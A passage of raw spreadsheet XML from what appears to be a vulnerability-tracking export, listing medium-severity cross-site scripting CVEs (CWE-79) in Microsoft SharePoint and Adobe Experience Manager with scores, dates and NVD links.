t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1359" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1359" s="5" t="inlineStr"><is><t>CVE-2026-69402</t></is></c><c r="D1359" s="5" t="n"><v>5.4</v></c><c r="E1359" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1359" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1359" s="5" t="inlineStr" /><c r="H1359" s="5" t="n"><v>0.004</v></c><c r="I1359" s="5" t="inlineStr" /><c r="J1359" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1359" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1359" s="5" t="inlineStr" /><c r="M1359" s="5" t="inlineStr" /><c r="N1359" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1359" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1359" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1359" s="5" t="inlineStr" /><c r="R1359" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1359" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1359" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69402</t></is></c></row><row r="1360"><c r="A1360" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1360" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1360" s="5" t="inlineStr"><is><t>CVE-2026-69417</t></is></c><c r="D1360" s="5" t="n"><v>5.4</v></c><c r="E1360" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1360" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1360" s="5" t="inlineStr" /><c r="H1360" s="5" t="n"><v>0.004</v></c><c r="I1360" s="5" t="inlineStr" /><c r="J1360" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1360" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1360" s="5" t="inlineStr" /><c r="M1360" s="5" t="inlineStr" /><c r="N1360" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1360" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1360" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1360" s="5" t="inlineStr" /><c r="R1360" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1360" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1360" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69417</t></is></c></row><row r="1361"><c r="A1361" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1361" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1361" s="5" t="inlineStr"><is><t>CVE-2026-69690</t></is></c><c r="D1361" s="5" t="n"><v>5.4</v></c><c r="E1361" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1361" s="5" t="inlineStr" /><c r="H1361" s="5" t="n"><v>0.004</v></c><c r="I1361" s="5" t="inlineStr" /><c r="J1361" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1361" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1361" s="5" t="inlineStr" /><c r="M1361" s="5" t="inlineStr" /><c r="N1361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1361" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1361" s="5" t="inlineStr" /><c r="R1361" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1361" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1361" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69690</t></is></c></row><row r="1362"><c r="A1362" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1362" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1362" s="5" t="inlineStr"><is><t>CVE-2026-71356</t></is></c><c r="D1362" s="5" t="n"><v>5.4</v></c><c r="E1362" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1362" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1362" s="5" t="inlineStr" /><c r="H1362" s="5" t="n"><v>0.003</v></c><c r="I1362" s="5" t="inlineStr" /><c r="J1362" s="5" t="inlineStr" /><c r="K1362" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1362" s="5" t="inlineStr" /><c r="M1362" s="5" t="inlineStr" /><c r="N1362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1362" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1362" s="5" t="inlineStr" /><c r="R1362" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71356</t></is></c></row><row r="1363"><c r="A1363" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1363" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1363" s="5" t="inlineStr"><is><t>CVE-2026-71357</t></is></c><c r="D1363" s="5" t="n"><v>5.4</v></c><c r="E1363" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1363" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1363" s="5" t="inlineStr" /><c r="H1363" s="5" t="n"><v>0.003</v></c><c r="I1363" s="5" t="inlineStr" /><c r="J1363" s="5" t="inlineStr" /><c r="K1363" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1363" s="5" t="inlineStr" /><c r="M1363" s="5" t="inlineStr" /><c r="N1363" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1363" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1363" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1363" s="5" t="inlineStr" /><c r="R1363" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71357</t></is></c></row><row r="1364"><c r="A1364" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1364" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1364" s="5" t="inlineStr"><is><t>CVE-2026-71388</t></is></c><c r="D1364" s="5" t="n"><v>5.4</v></c><c r="E1364" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1364" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1364" s="5" t="inlineStr" /><c r="H1364" s="5" t="n"><v>0.003</v></c><c r="I1364" s="5" t="inlineStr" /><c r="J1364" s="5" t="inlineStr" /><c r="K1364" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1364" s="5" t="inlineStr" /><c r="M1364" s="5" t="inlineStr" /><c r="N1364" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1364" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1364" s="5" t="inlineStr" /><c r="R1364" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71388</t></is></c></row><row r="1365"><c r="A1365" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1365" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1365" s="5" t="inlineStr"><is><t>CVE-2026-71440</t></is></c><c r="D1365" s="5" t="n"><v>5.4</v></c><c r="E1365" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1365" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1365" s="5" t="inlineStr" /><c r="H1365" s="5" t="n"><v>0.002</v></c><c r="I1365" s="5" t="inlineStr" /><c r="J1365" s="5" t="inlineStr" /><c r="K1365" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1365" s="5" t="inlineStr" /><c r="M1365" s="5" t="inlineStr" /><c r="N1365" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1365" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1365" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1365" s="5" t="inlineStr" /><c r="R1365" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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65" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71440</t></is></c></row><row r="1366"><c r="A1366" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1366" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1366" s="5" t="inlineStr"><is><t>CVE-2026-71565</t></is></c><c r="D1366" s="5" t="n"><v>5.4</v></c><c r="E1366" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1366" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1366" s="5" t="inlineStr" /><c r="H1366" s="5" t="n"><v>0.002</v></c><c r="I1366" s="5" t="inlineStr" /><c r="J1366" s="5" t="inlineStr" /><c r="K1366" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1366" s="5" t="inlineStr" /><c r="M1366" s="5" t="inlineStr" /><c r="N1366" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1366" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1366" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1366" s="5" t="inlineStr" /><c r="R1366" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71565</t></is></c></row><row r="1367"><c r="A1367" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1367" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1367" s="5" t="inlineStr"><is><t>CVE-2026-72626</t></is></c><c r="D1367" s="5" t="n"><v>5.4</v></c><c r="E1367" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1367" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1367" s="5" t="inlineStr" /><c r="H1367" s="5" t="n"><v>0.002</v></c><c r="I1367" s="5" t="inlineStr" /><c r="J1367" s="5" t="inlineStr" /><c r="K1367" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1367" s="5" t="inlineStr" /><c r="M1367" s="5" t="inlineStr" /><c r="N1367" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1367" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1367" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1367" s="5" t="inlineStr" /><c r="R1367" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72626</t></is></c></row><row r="1368"><c r="A1368" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1368" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1368" s="5" t="inlineStr"><is><t>CVE-2026-72627</t></is></c><c r="D1368" s="5" t="n"><v>5.4</v></c><c r="E1368" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1368" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1368" s="5" t="inlineStr" /><c r="H1368" s="5" t="n"><v>0.002</v></c><c r="I1368" s="5" t="inlineStr" /><c r="J1368" s="5" t="inlineStr" /><c r="K1368" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1368" s="5" t="inlineStr" /><c r="M1368" s="5" t="inlineStr" /><c r="N1368" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1368" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1368" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1368" s="5" t="inlineStr" /><c r="R1368" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72627</t></is></c></row><row r="1369"><c r="A1369" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1369" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1369" s="5" t="inlineStr"><is><t>CVE-2026-75629</t></is></c><c r="D1369" s="5" t="n"><v>5.4</v></c><c r="E1369" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1369" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1369" s="5" t="inlineStr" /><c r="H1369" s="5" t="n"><v>0.002</v></c><c r="I1369" s="5" t="inlineStr" /><c r="J1369" s="5" t="inlineStr" /><c r="K1369" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1369" s="5" t="inlineStr" /><c r="M1369" s="5" t="inlineStr" /><c r="N1369" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1369" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1369" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1369" s="5" t="inlineStr" /><c r="R1369" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75629</t></is></c></row><row r="1370"><c r="A1370" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1370" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1370" s="5" t="inlineStr"><is><t>CVE-2026-75635</t></is></c><c r="D1370" s="5" t="n"><v>5.4</v></c><c r="E1370" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1370" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1370" s="5" t="inlineStr" /><c r="H1370" s="5" t="n"><v>0.002</v></c><c r="I1370" s="5" t="inlineStr" /><c r="J1370" s="5" t="inlineStr" /><c r="K1370" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1370" s="5" t="inlineStr" /><c r="M1370" s="5" t="inlineStr" /><c r="N1370" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1370" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1370" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1370" s="5" t="inlineStr" /><c r="R1370" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75635</t></is></c></row><row r="1371"><c r="A1371" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1371" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1371" s="5" t="inlineStr"><is><t>CVE-2026-75636</t></is></c><c r="D1371" s="5" t="n"><v>5.4</v></c><c r="E1371" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1371" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1371" s="5" t="inlineStr" /><c r="H1371" s="5" t="n"><v>0.002</v></c><c r="I1371" s="5" t="inlineStr" /><c r="J1371" s="5" t="inlineStr" /><c r="K1371" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1371" s="5" t="inlineStr" /><c r="M1371" s="5" t="inlineStr" /><c r="N1371" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1371" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1371" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1371" s="5" t="inlineStr" /><c r="R1371" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75636</t></is></c></row><row r="1372"><c r="A1372" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1372" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1372" s="5" t="inlineStr"><is><t>CVE-2026-75637</t></is></c><c r="D1372" s="5" t="n"><v>5.4</v></c><c r="E1372" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1372" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1372" s="5" t="inlineStr" /><c r="H1372" s="5" t="n"><v>0.003</v></c><c r="I1372" s="5" t="inlineStr" /><c r="J1372" s="5" t="inlineStr" /><c r="K1372" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1372" s="5" t="inlineStr" /><c r="M1372" s="5" t="inlineStr" /><c r="N1372" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1372" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1372" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1372" s="5" t="inlineStr" /><c r="R1372" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75637</t></is></c></row><row r="1373"><c r="A1373" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1373" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1373" s="5" t="inlineStr"><is><t>CVE-2026-75639</t></is></c><c r="D1373" s="5" t="n"><v>5.4</v></c><c r="E1373" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1373" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1373" s="5" t="inlineStr" /><c r="H1373" s="5" t="n"><v>0.002</v></c><c r="I1373" s="5" t="inlineStr" /><c r="J1373" s="5" t="inlineStr" /><c r="K1373" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1373" s="5" t="inlineStr" /><c r="M1373" s="5" t="inlineStr" /><c r="N1373" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1373" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1373" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1373" s="5" t="inlineStr" /><c r="R1373" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75639</t></is></c></row><row r="1374"><c r="A1374" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1374" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1374" s="5" t="inlineStr"><is><t>CVE-2026-75640</t></is></c><c r="D1374" s="5" t="n"><v>5.4</v></c><c r="E1374" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1374" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1374" s="5" t="inlineStr" /><c r="H1374" s="5" t="n"><v>0.002</v></c><c r="I1374" s="5" t="inlineStr" /><c r="J1374" s="5" t="inlineStr" /><c r="K1374" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1374" s="5" t="inlineStr" /><c r="M1374" s="5" t="inlineStr" /><c r="N1374" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1374" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1374" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1374" s="5" t="inlineStr" /><c r="R1374" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75640</t></is></c></row><row r="1375"><c r="A1375" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1375" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1375" s="5" t="inlineStr"><is><t>CVE-2026-75642</t></is></c><c r="D1375" s="5" t="n"><v>5.4</v></c><c r="E1375" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1375" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1375" s="5" t="inlineStr" /><c r="H1375" s="5" t="n"><v>0.002</v></c><c r="I1375" s="5" t="inlineStr" /><c r="J1375" s="5" t="inlineStr" /><c r="K1375" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1375" s="5" t="inlineStr" /><c r="M1375" s="5" t="inlineStr" /><c r="N1375" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1375" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1375" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1375" s="5" t="inlineStr" /><c r="R1375" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75642</t></is></c></row><row r="1376"><c r="A1376" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1376" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1376" s="5" t="inlineStr"><is><t>CVE-2026-75643</t></is></c><c r="D1376" s="5" t="n"><v>5.4</v></c><c r="E1376" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1376" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1376" s="5" t="inlineStr" /><c r="H1376" s="5" t="n"><v>0.002</v></c><c r="I1376" s="5" t="inlineStr" /><c r="J1376" s="5" t="inlineStr" /><c r="K1376" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1376" s="5" t="inlineStr" /><c r="M1376" s="5" t="inlineStr" /><c r="N1376" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1376" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1376" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1376" s="5" t="inlineStr" /><c r="R1376" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75643</t></is></c></row><row r="1377"><c r="A1377" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1377" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1377" s="5" t="inlineStr"><is><t>CVE-2026-75644</t></is></c><c r="D1377" s="5" t="n"><v>5.4</v></c><c r="E1377" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1377" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1377" s="5" t="inlineStr" /><c r="H1377" s="5" t="n"><v>0.002</v></c><c r="I1377" s="5" t="inlineStr" /><c r="J1377" s="5" t="inlineStr" /><c r="K1377" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1377" s="5" t="inlineStr" /><c r="M1377" s="5" t="inlineStr" /><c r="N1377" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1377" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1377" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1377" s="5" t="inlineStr" /><c r="R1377" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75644</t></is></c></row><row r="1378"><c r="A1378" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1378" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1378" s="5" t="inlineStr"><is><t>CVE-2026-75646</t></is></c><c r="D1378" s="5" t="n"><v>5.4</v></c><c r="E1378" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1378" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1378" s="5" t="inlineStr" /><c r="H1378" s="5" t="n"><v>0.002</v></c><c r="I1378" s="5" t="inlineStr" /><c r="J1378" s="5" t="inlineStr" /><c r="K1378" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1378" s="5" t="inlineStr" /><c r="M1378" s="5" t="inlineStr" /><c r="N1378" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1378" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1378" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1378" s="5" t="inlineStr" /><c r="R1378" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75646</t></is></c></row><row r="1379"><c r="A1379" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1379" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1379" s="5" t="inlineStr"><is><t>CVE-2026-75647</t></is></c><c r="D1379" s="5" t="n"><v>5.4</v></c><c r="E1379" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1379" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1379" s="5" t="inlineStr" /><c r="H1379" s="5" t="n"><v>0.002</v></c><c r="I1379" s="5" t="inlineStr" /><c r="J1379" s="5" t="inlineStr" /><c r="K1379" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1379" s="5" t="inlineStr" /><c r="M1379" s="5" t="inlineStr" /><c r="N1379" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1379" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1379" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1379" s="5" t="inlineStr" /><c r="R1379" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75647</t></is></c></row><row r="1380"><c r="A1380" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1380" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1380" s="5" t="inlineStr"><is><t>CVE-2026-75651</t></is></c><c r="D1380" s="5" t="n"><v>5.4</v></c><c r="E1380" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1380" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1380" s="5" t="inlineStr" /><c r="H1380" s="5" t="n"><v>0.002</v></c><c r="I1380" s="5" t="inlineStr" /><c r="J1380" s="5" t="inlineStr" /><c r="K1380" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1380" s="5" t="inlineStr" /><c r="M1380" s="5" t="inlineStr" /><c r="N1380" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1380" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1380" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1380" s="5" t="inlineStr" /><c r="R1380" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75651</t></is></c></row><row r="1381"><c r="A1381" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1381" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1381" s="5" t="inlineStr"><is><t>CVE-2026-75652</t></is></c><c r="D1381" s="5" t="n"><v>5.4</v></c><c r="E1381" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1381" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1381" s="5" t="inlineStr" /><c r="H1381" s="5" t="n"><v>0.002</v></c><c r="I1381" s="5" t="inlineStr" /><c r="J1381" s="5" t="inlineStr" /><c r="K1381" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1381" s="5" t="inlineStr" /><c r="M1381" s="5" t="inlineStr" /><c r="N1381" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1381" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1381" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1381" s="5" t="inlineStr" /><c r="R1381" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75652</t></is></c></row><row r="1382"><c r="A1382" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1382" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1382" s="5" t="inlineStr"><is><t>CVE-2026-75657</t></is></c><c r="D1382" s="5" t="n"><v>5.4</v></c><c r="E1382" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1382" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1382" s="5" t="inlineStr" /><c r="H1382" s="5" t="n"><v>0.002</v></c><c r="I1382" s="5" t="inlineStr" /><c r="J1382" s="5" t="inlineStr" /><c r="K1382" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1382" s="5" t="inlineStr" /><c 